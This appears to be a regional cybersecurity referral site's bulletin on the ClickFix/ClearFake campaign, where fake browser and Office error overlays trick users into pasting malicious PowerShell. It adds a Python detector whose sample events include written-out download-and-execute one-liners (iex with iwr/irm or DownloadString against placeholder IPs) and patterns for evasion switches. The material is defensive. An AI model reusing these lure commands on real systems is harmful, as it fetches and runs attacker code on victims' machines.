
Digital safety starts here for both commercial and personal Use...

Defend Your Business Against the Latest WNY Cyber Threats

We offer Safe, Secure and Affordable Solutions for your Business and Personal Networks and Devices.



WNYCyber is there to help you choose the best service providers in Western New York... We DO NOT provide the services ourselves, as we are Internet Programmers who have to deal daily with Cyber Threats... (Ugghhh)... So we know what it's like and what it takes to protect OUR and OUR CUSTOMERS' DATA... We built this Website to help steer you to those that can give you the best service at realistic and non-inflated prices. We do not charge or collect any fees.

Fake Google Chrome Errors Trick You into Running Malicious PowerShell Scripts

Summary:
A malware distribution campaign has emerged that uses fake error messages styled as Google Chrome, Microsoft Word, and OneDrive problems to deceive users into running malicious PowerShell scripts. The campaign is tied to several threat clusters, including ClearFake, ClickFix, and TA571, all previously associated with spam distribution and malware delivery.

The attackers use compromised websites, and HTML email attachments carrying JavaScript, to display convincing error overlays. The overlay tells the user to "fix" the problem by copying a PowerShell command and pasting it into a console. No software vulnerability is exploited: the victim runs the command themselves, so it executes with whatever rights that user has, and the browser or mail client sees nothing more than a dialog. Once executed, the scripts install malware strains including DarkGate, Matanbuchus, NetSupport, Amadey Loader, XMRig, a clipboard hijacker, and Lumma Stealer, whose aims range from information theft and crypto-mining to staging further compromise of the infected system.

Security Officer Comments:
The campaign relies on social engineering rather than an exploit. It presents users with an apparent technical problem and offers a quick fix in the form of a PowerShell command, trading on their trust in familiar Chrome, Word and OneDrive dialogs and their urgency to make the error go away. Three attack chains have been observed, each with a different entry point: overlays injected into compromised websites, fake browser error pages served from compromised websites, and HTML email attachments posing as Microsoft Word documents. This diversification increases the likelihood of successful infections across different user environments.

Suggested Corrections:
To mitigate these threats, organizations and individuals should take proactive steps. Keeping software patched and current closes known vulnerabilities, although this campaign needs none: it succeeds only if a user runs the pasted command, so the controls around that step matter most. Security awareness training should teach users that no legitimate website or document asks them to paste commands into PowerShell, and how to report such prompts. Endpoint protection, email filtering, and web security controls can detect and block the scripts and payloads before they execute; on Windows, enabling PowerShell script block logging and applying application control to PowerShell for standard users makes a pasted one-liner visible to the security team or stops it outright. Developing and testing incident response plans helps organizations quickly identify, contain, and mitigate the impact of malware infections.
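As an added example (not code from the article, from this site, or from the campaign described): a small Python triage routine that applies the pattern above to PowerShell command lines and logged script blocks. The event records, pids, URLs and the flagging rule are constructed for illustration; the switches and cmdlet names it looks for are real PowerShell syntax.

```python
"""Flag PowerShell command lines or logged script blocks that match the
copy-and-paste "fix" pattern: a one-liner that hides its window, bypasses
the execution policy and runs code fetched from a URL.

Added example for this page, not code from the article or the site.
The events below are constructed, not captured telemetry."""
import base64
import re

# Switches an unattended one-liner needs but an interactive user almost never types.
EVASION = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I),
    "policy_bypass": re.compile(r"-e(?:p|x\w*)\s+bypass\b", re.I),
    "no_profile": re.compile(r"-nop(?:rofile)?\b", re.I),
}
# -EncodedCommand and the prefixes powershell.exe accepts (-e, -ec, -enc), then base64.
ENCODED = re.compile(r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{20,})", re.I)
# Download-and-execute primitives; these are also searched in the decoded payload.
EXECUTION = {
    "invoke_expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "remote_fetch": re.compile(
        r"\biwr\b|\birm\b|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient",
        re.I),
    "url": re.compile(r"https?://[^\s'\"]+", re.I),
}


def decode_encoded_command(text):
    """Return the UTF-16LE plaintext of an -EncodedCommand payload, or "" if absent or undecodable."""
    m = ENCODED.search(text)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return ""


def analyze(text):
    """Score one command line (Event 4688 / Sysmon 1) or one script block (Event 4104)."""
    decoded = decode_encoded_command(text)
    hits = {name for name, rx in EVASION.items() if rx.search(text)}
    if ENCODED.search(text):
        hits.add("encoded_command")
    scan = text + "\n" + decoded
    hits |= {name for name, rx in EXECUTION.items() if rx.search(scan)}
    # Rule: execute something that was just fetched. Either half alone is common in admin
    # scripts; the evasion switches are reported as context, not used as the trigger.
    flagged = "invoke_expression" in hits and bool({"remote_fetch", "url"} & hits)
    return {"hits": sorted(hits), "decoded": decoded, "flagged": flagged}


def triage(events):
    """Return the pids of the events the rule flags, in input order."""
    return [e["pid"] for e in events if analyze(e["text"])["flagged"]]


# Constructed payload for the -EncodedCommand case (documentation IP range, not a real host).
ENCODED_PAYLOAD = base64.b64encode(
    "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://198.51.100.7/a.txt')"
    .encode("utf-16le")).decode("ascii")

# Constructed events: two lure one-liners, two legitimate admin invocations, one pasted script block.
SAMPLE_EVENTS = [
    {"pid": 101, "source": "4688", "text":
        "powershell.exe -w hidden -ep bypass -nop -c \"iex (iwr 'http://203.0.113.5/fix.ps1' -UseBasicParsing)\""},
    {"pid": 102, "source": "4688", "text":
        "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand " + ENCODED_PAYLOAD},
    {"pid": 103, "source": "4688", "text":
        r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\inventory.ps1"},
    # Pasted into an already-open console: no switches on the process, only the script block is logged.
    {"pid": 104, "source": "4104", "text": "iex (irm 'http://203.0.113.5/fix.txt')"},
    {"pid": 105, "source": "4688", "text": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        r = analyze(e["text"])
        print(e["pid"], e["source"], "FLAGGED" if r["flagged"] else "ok", ", ".join(r["hits"]))
```

When the user pastes into a console they already opened, the process command line carries none of the tell-tale switches; only script block logging (Event ID 4104) records what ran, which is why the routine accepts raw script text as well as command lines. A bare Invoke-WebRequest that writes a file is deliberately not flagged, and -EncodedCommand payloads that fail to decode are reported but not treated as proof on their own.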

Link(s):
https://www.bleepingcomputer.com/ne...ou-into-running-malicious-powershell-scripts/